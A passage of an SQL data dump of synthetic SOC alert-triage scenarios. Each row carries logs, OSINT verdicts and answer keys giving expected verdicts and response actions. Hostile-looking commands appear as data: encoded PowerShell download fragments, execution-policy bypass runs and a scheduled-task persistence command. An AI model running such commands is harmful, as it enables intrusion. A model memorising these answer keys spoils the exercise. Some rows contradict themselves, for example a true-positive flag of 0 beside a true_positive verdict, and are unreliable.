traffic\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f5c8f7b9d1c8a2c9f8d6a0e7b0f2d1e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash corresponds to a known internal application\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address for ICS network\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The traffic was from a legitimate internal application, not a C2 communication.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2208, 'Suspicious Packed Executable Detected in Healthcare Network', 'high', 'IDA Pro', 'A packed executable was detected running on an internal host. Reverse engineering revealed it contains capabilities for persistence.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"host-01\",\"command_line\":\"C:\\\\Windows\\\\Temp\\\\malware.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a healthcare network device\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash reported as malicious by 32 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\Temp\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable packed and contains persistence mechanisms\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable is confirmed malicious due to multiple antivirus detections and analysis showing persistence capability.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2209, 'Malicious Macro Execution Attempt Blocked', 'critical', 'Cuckoo Sandbox', 'An email attachment containing a malicious macro was opened on a workstation, triggering execution of a known malicious command.', 'Phishing', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"host-02\",\"command_line\":\"powershell.exe -encodedCommand aQBlAG4AdgBvAGsAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"email_sender\":\"malicious@example.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a finance sector workstation\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro file hash identified as malicious by 40 AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"malicious@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address associated with multiple phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -encodedCommand aQBlAG4AdgBvAGsAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command used for malicious macro execution\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The macro attempted to execute a malicious PowerShell command, validated by the 
encoded payload analysis.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2210, 'Suspected Malicious Domain Access from Internal Host', 'medium', 'Any.Run', 'An internal host attempted to access a domain known for distributing malware. The domain was flagged by threat intelligence.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"198.51.100.50\",\"username\":\"bwhite\",\"hostname\":\"host-03\",\"domain\":\"maliciousdomain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a device within tech infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with malware distribution activities\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain flagged for hosting malware payloads\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Access attempt to a known malicious domain suggests potential compromise, requiring containment actions.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2211, 'False Positive: Encoded PowerShell Detected', 'low', 'Ghidra', 'A PowerShell script with encoded content was detected. Analysis revealed it was a legitimate administrative script.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.15\",\"dst_ip\":\"\",\"username\":\"davis\",\"hostname\":\"host-04\",\"command_line\":\"powershell.exe -encodedCommand aQBlAHgAUwBjAHIAaQBwAHQARQB4AGUAYwB1AHQAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a government machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -encodedCommand aQBlAHgAUwBjAHIAaQBwAHQARQB4AGUAYwB1AHQAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command verified as legitimate system maintenance script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PowerShell activity was part of routine system maintenance, confirmed via script analysis.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2212, 'False Positive: Misconfigured Internal Web Request', 'medium', 'Cuckoo Sandbox', 'An internal server sent a web request with an unusual payload. Investigation showed it was due to a misconfiguration causing non-malicious traffic.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.5.20\",\"dst_ip\":\"192.168.5.30\",\"username\":\"webservice\",\"hostname\":\"web-server-1\",\"request_body\":\"SELECT * FROM users WHERE user_id = \'1\'\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of an internal web service\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of an internal database server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"SELECT * FROM users WHERE user_id = \'1\'\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"SQL payload found to be part of a misconfigured service query\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL payload was part of a legitimate query from a misconfigured service, posing no threat.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2213, 'Packed Executable Detected on Internal Machine', 'high', 'Cuckoo Sandbox', 'A packed executable was detected and analyzed, revealing potential malicious behavior. The executable initiated network connections to a known C2 IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation1\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\suspicious.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Trojan malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable exhibited behavior consistent with malware, connecting to a known C2 server.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2214, 'Malicious Macro in Document Detected', 'critical', 'Any.Run', 'A document containing a malicious macro was detected attempting to execute PowerShell commands on a victim machine.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"asmith\",\"hostname\":\"laptop-asmith\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\asmith\\\\Downloads\\\\malicious.docm\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\asmith\\\\Downloads\\\\malicious.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with macro execution of PowerShell\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The document contained a macro that attempted to execute unauthorized commands, indicating an attack attempt.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2215, 'Suspicious Network Activity from Internal Host', 'medium', 'Ghidra', 'An internal host was observed making unusual network connections to an external IP with no known association with business operations.', 'Data Exfiltration', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.7\",\"username\":\"kwhite\",\"hostname\":\"desktop-kwhite\",\"domain\":\"suspicious-domain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple data exfiltration incidents\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"suspicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain flagged for phishing and data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network connections to a known malicious domain suggest an attempt to exfiltrate data from the network.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2216, 'False Positive: Legitimate Software Packed as an Executable', 'low', 'IDA Pro', 'A packed executable was detected, but further analysis revealed it to be a legitimate application update.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"172.16.0.20\",\"username\":\"mjohnson\",\"hostname\":\"tablet-mjohnson\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the device\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash is associated with a clean and legitimate file\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The software was verified as a legitimate application update, causing a false positive alert.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2217, 'False Positive: Script Execution Triggered by Software Update', 'low', 'Any.Run', 'A script execution was flagged as suspicious, but investigation confirmed it was part of a routine software update.', 'Malware', 'T1064', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"10.0.0.8\",\"username\":\"lwilson\",\"hostname\":\"server-lwilson\",\"command_line\":\"/usr/bin/python3 /opt/update_script.py\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/python3 /opt/update_script.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Script execution is part of legitimate update processes\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The script execution was part of a scheduled update, confirming it as a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2218, 'Packed Executable Detected via Cuckoo Sandbox Analysis', 'high', 'Cuckoo Sandbox', 'A packed executable was detected during analysis, showing signs of malicious behavior with attempts to contact a known C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:34:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-5F3H1G\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\malicious.exe\",\"file_hash\":\"f3a8f8d9c8e9d1a9b1b9c8d7e8f9a1b2\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f3a8f8d9c8e9d1a9b1b9c8d7e8f9a1b2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executables in user downloads folder are often malicious\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The IP address and file hash were identified as involved in malicious activities, confirming a malware infection.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2219, 'Suspicious Macro Activity Detected in Finance Department', 'critical', 'Any.Run', 'A suspicious macro was executed from a document received via email, attempting to download additional payloads.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:55:27Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.45\",\"dst_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"FINANCE-PC01\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /m\",\"file_hash\":\"c4d9e9f7b8a9d0e8c7b6a5e4f3d2c1b0\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP is linked to malicious macro download activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"c4d9e9f7b8a9d0e8c7b6a5e4f3d2c1b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro hash identified in multiple ransomware cases\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /m\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro execution via WINWORD indicates potential malware delivery\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine within the finance department\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Macro execution from an email attachment led to network connections to a known malicious IP, 
confirming the threat.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2220, 'Potential Malicious Macro Execution - False Positive', 'medium', 'IDA Pro', 'A macro execution was observed in a document; however, further investigation shows it was part of a legitimate update process.', 'Malware', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.100\",\"username\":\"bwhite\",\"hostname\":\"HR-DEPT-PC\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE /x\",\"file_hash\":\"a1b2c3d4e5f67890abcdef1234567890\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890abcdef1234567890\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash matches legitimate Microsoft Office update\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE /x\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Excel macro execution as part of an update process\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the HR department machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Upon review, the macro execution was identified as part of a routine update, leading to a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2221, 'Packed Executable Analyzed - False Positive', 'medium', 'Ghidra', 'A packed executable was analyzed and initially flagged as suspicious, but further investigation confirmed it was benign software.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:22:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.15\",\"dst_ip\":\"198.51.100.50\",\"username\":\"mjones\",\"hostname\":\"ENGINEERING-PC03\",\"command_line\":\"C:\\\\Program Files\\\\EngineeringSoftware\\\\install.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"IP is associated with legitimate software updates\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash corresponds to verified engineering software\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\EngineeringSoftware\\\\install.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Installation executable for recognized software\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.20.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the engineering department machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable was initially flagged due to packing, but was identified as a legitimate engineering tool.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2222, 'Malicious Macro Executed - Attempt to Gain Persistence', 'critical', 'Cuckoo Sandbox', 'A malicious macro was executed, attempting to create a scheduled task for persistence, linked to a known threat actor.', 'Malware', 'T1053', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:15:42Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.20\",\"dst_ip\":\"203.0.113.25\",\"username\":\"slee\",\"hostname\":\"CEO-LAPTOP\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\schtasks.exe /Create /SC Daily /TN \\\"Updater\\\" /TR \\\"C:\\\\Temp\\\\update.vbs\\\"\",\"file_hash\":\"abcdef1234567890abcdef1234567890\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP has been used in multiple APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcdef1234567890abcdef1234567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro hash associated with known malware for persistence\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\schtasks.exe /Create /SC Daily /TN \\\"Updater\\\" /TR \\\"C:\\\\Temp\\\\update.vbs\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Scheduled task creation for persistence on the host\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the CEO\'s laptop\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The creation of a scheduled task for persistence, along with communication to 
a C2 server, confirms the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2223, 'Suspicious Packed Executable Detected via IDA Pro Analysis', 'high', 'IDA Pro', 'A packed executable was detected attempting to execute on a victim machine. Reverse engineering revealed suspicious code execution patterns indicative of malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"hostname\":\"victim-pc\",\"command_line\":\"C:\\\\Windows\\\\temp\\\\malware.exe /silent\",\"file_hash\":\"4a1d8f72c873e6f8d7a2d4f1b6c8d9e3\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 102 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a1d8f72c873e6f8d7a2d4f1b6c8d9e3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan.Packed\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Executable packed with known malicious patterns; confirmed via reverse engineering and OSINT.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2224, 'Macro-Based Malware Execution Detected via Ghidra', 'critical', 'Ghidra', 'Analysis of a macro-enabled document revealed code execution leading to a PowerShell payload download. This indicates a macro-based initial access attempt.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"workstation-12\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\asmith\\\\Documents\\\\malicious.ps1\",\"file_hash\":\"b52c8f33f2a9e8fbd7e5a7c9a2f4d1e2\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim 